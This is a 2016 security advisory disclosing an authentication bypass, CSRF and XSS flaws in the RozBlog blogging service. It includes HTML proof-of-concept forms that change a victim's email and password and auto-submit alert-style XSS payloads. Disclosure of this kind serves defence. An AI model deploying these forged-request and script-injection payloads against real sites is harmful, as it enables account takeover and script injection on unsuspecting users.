RozBlog Weblog Service Authentication Bypass / CSRF / CSS

Risk: Medium
Local: No
Remote: Yes

Document Title: =============== RozBlog Weblog Service - Authentication Bypass / Cross Site Request Forgery / Cross Site Scripting References (Source): ==================== Release Date: ============= 2016-02-23 Product & Service Introduction: =============================== Roseblog is one of the most famous blogging services, it has many special features that indicate you an interesting experience of blogging. Vulnerability Type: ========================= Authentication Bypass Cross Site Request Forgery Cross Site Scripting Vulnerability Details: ============================== I discovered an authentication bypass(change Email) vulnerability and a client-side cross site request forgery web vulnerability and a cross site scripting vulnerability and in (Weblog Service). Exploitation Technique: ======================= Remote Severity Level: =============== Medium Proof of Concept (PoC): ======================= -- Cross Site Request Forgery & Authentication Bypass -- -- PoC 1 -- -- To edit the e-mail users must first enter the old password on other page, but with this exploit no longer requires it and bypass that. -- <html> <head> <title>Authentication Bypass - Csrf</title> </head> <body> <form action="" method="post"> <input type="text" name="email" value="" > <input type="text" name="name" value="Ehsan"> <input type="text" name="age" value="10"> <input type="text" name="site" value=""> <input type="text" name="country" value="Country"> <input type="text" name="city" value="IRan"> <input type="text" name="about" value="About User"> <input type="text" name="yahoo" value="Yahoo Id"> <input type="text" name="password" value="123@abc"> <input type="submit" name="edit_profile" value="Attak"> </form> </body> </html> -- PoC 2 -- <html> <head> <title>XSS - Csrf</title> </head> <body onload="document.contactfrm.submit()"> <form action="" name="contactfrm" method="post"> <input type="text" name="singer" value='"><img src=x onerror=alert(1)>'> <input type="text" name="subject" value='"><img src=x onerror=alert(2)>'> <input type="text" name="message" value='"></textarea><img src=x onerror=alert(3)>'> </form> </body> </html> -- PoC 3 -- -- Cross Site Scripting -- -- For action attribute enter address of weblog or one of domains -- <html> <head> <title>Cross Site Scripting</title> </head> <body onload=""> <form action='' method='POST' name='info'> <input name="c" id="c" value="2" type="hidden"> <input name='themecode' value="<script>alert('Ehsan')</script>"> </form> </body> </html> Author: ================== Ehsan Hosseini SPX tnx to: =========== Bl4ck_mohajem Alireza Contact: ========


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top